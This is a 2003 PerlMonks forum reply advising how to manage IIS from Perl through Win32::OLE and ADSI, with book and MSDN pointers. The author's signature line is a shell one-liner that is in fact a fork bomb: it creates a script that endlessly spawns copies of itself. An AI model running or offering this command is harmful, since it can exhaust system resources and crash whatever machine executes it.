Beefy Boxes and Bandwidth Generously Provided by pair Networks
No such thing as a small change
 
PerlMonks  

Re: IIS (Internet Information Services)

by ibanix (Hermit)
on Jan 25, 2003 at 09:46 UTC ( [id://229817]=note: print w/replies, xml ) Need Help??


in reply to IIS (Internet Information Services)

Hi Shadow,

Win32::OLE is your best bet. You will need to use the Active Directory Services Interface (ADSI) to access the IIS ADSI provider, aka "IIS:".

This can be very challenging. I highly recommend you pickup a copy of David Roth's excellent book, Win32 Perl Scripting: The Administrator's Handbook. It has been an invaluable tool for me in my quest to conquer my Win32 network using Perl.

Also, you should read the ADSI Overview, and the full ADSI doucmentation at the MSDN Library. In the latter, pick Network and Directory services, then the Active Directory, ADSI and Directory Services option.

Good luck. I wonder if there is any interest in an IIS module which runs on top of Win32::OLE?

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://229817]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others admiring the Monastery: (7)
As of 2024-04-25 09:03 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found